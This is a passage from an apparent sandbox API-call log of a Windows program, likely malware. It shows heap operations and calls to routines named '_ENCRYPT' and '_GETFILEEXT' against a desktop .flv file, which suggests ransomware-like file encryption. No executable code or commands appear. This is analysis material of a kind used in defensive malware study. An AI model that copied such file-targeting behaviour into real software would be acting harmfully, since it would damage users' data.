HALPmcxz\\Desktop\\mKicOCoALM.flv") returned 53 [0162.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0162.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0162.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0162.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0162.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0162.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0162.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0162.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0162.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0162.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0162.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0162.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0162.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0162.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0162.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0162.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0162.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0162.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0162.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0162.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0162.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0162.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0162.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0162.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0162.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0162.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0162.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0162.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0162.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0162.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0162.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0162.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0162.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0162.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0162.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0162.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0162.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0162.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0162.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0162.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0162.466] FreeLibrary (hLibModule=0x75990000) returned 1 [0162.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0162.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0162.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0162.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0162.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0162.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0162.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0162.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0162.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0162.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0162.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0162.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0162.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0162.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0162.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0162.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0162.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0162.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0162.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0162.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0162.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0162.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0162.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0162.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0162.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0162.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0162.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0162.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0162.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0162.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0162.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0162.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0162.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0162.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0162.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0162.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0162.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0162.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0162.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0162.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0162.472] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0162.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0162.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0162.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0162.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0162.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0162.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0162.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0162.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0162.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0162.472] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0162.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0162.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0162.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0162.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0162.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0162.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0162.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0162.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0162.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0162.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0162.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0162.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0162.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0162.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0162.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0162.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0162.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0162.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0162.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0162.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0162.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0162.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0162.473] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0162.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0162.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0162.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0162.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0162.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0162.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0162.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0162.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0162.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0162.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0162.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0162.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0162.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0162.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0162.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0162.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.474] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0162.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0162.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0162.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0162.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0162.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bdb10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0162.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0162.475] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0162.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0162.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0162.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0162.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0162.475] CloseHandle (hObject=0x120) returned 1 [0162.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0162.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0162.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0162.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0162.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0162.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0162.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0162.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0162.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0162.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0162.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0162.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0162.476] FreeLibrary (hLibModule=0x75990000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0162.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0162.476] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0162.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0162.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0162.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0162.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0162.477] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0162.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0162.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0162.477] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0162.477] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0162.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0162.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0162.477] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0162.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0162.477] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa07af50, ftCreationTime.dwHighDateTime=0x1d5dc36, ftLastAccessTime.dwLowDateTime=0x836c1090, ftLastAccessTime.dwHighDateTime=0x1d5e62a, ftLastWriteTime.dwLowDateTime=0x836c1090, ftLastWriteTime.dwHighDateTime=0x1d5e62a, nFileSizeHigh=0x0, nFileSizeLow=0xd79a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="mKicOCoALM.flv", cAlternateFileName="MKICOC~1.FLV")) returned 0x90add8 [0162.479] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0162.479] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa07af50, ftCreationTime.dwHighDateTime=0x1d5dc36, ftLastAccessTime.dwLowDateTime=0x836c1090, ftLastAccessTime.dwHighDateTime=0x1d5e62a, ftLastWriteTime.dwLowDateTime=0x836c1090, ftLastWriteTime.dwHighDateTime=0x1d5e62a, nFileSizeHigh=0x0, nFileSizeLow=0xd79a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="mKicOCoALM.flv", cAlternateFileName="MKICOC~1.FLV")) returned 0x90add8 [0162.480] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0162.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS 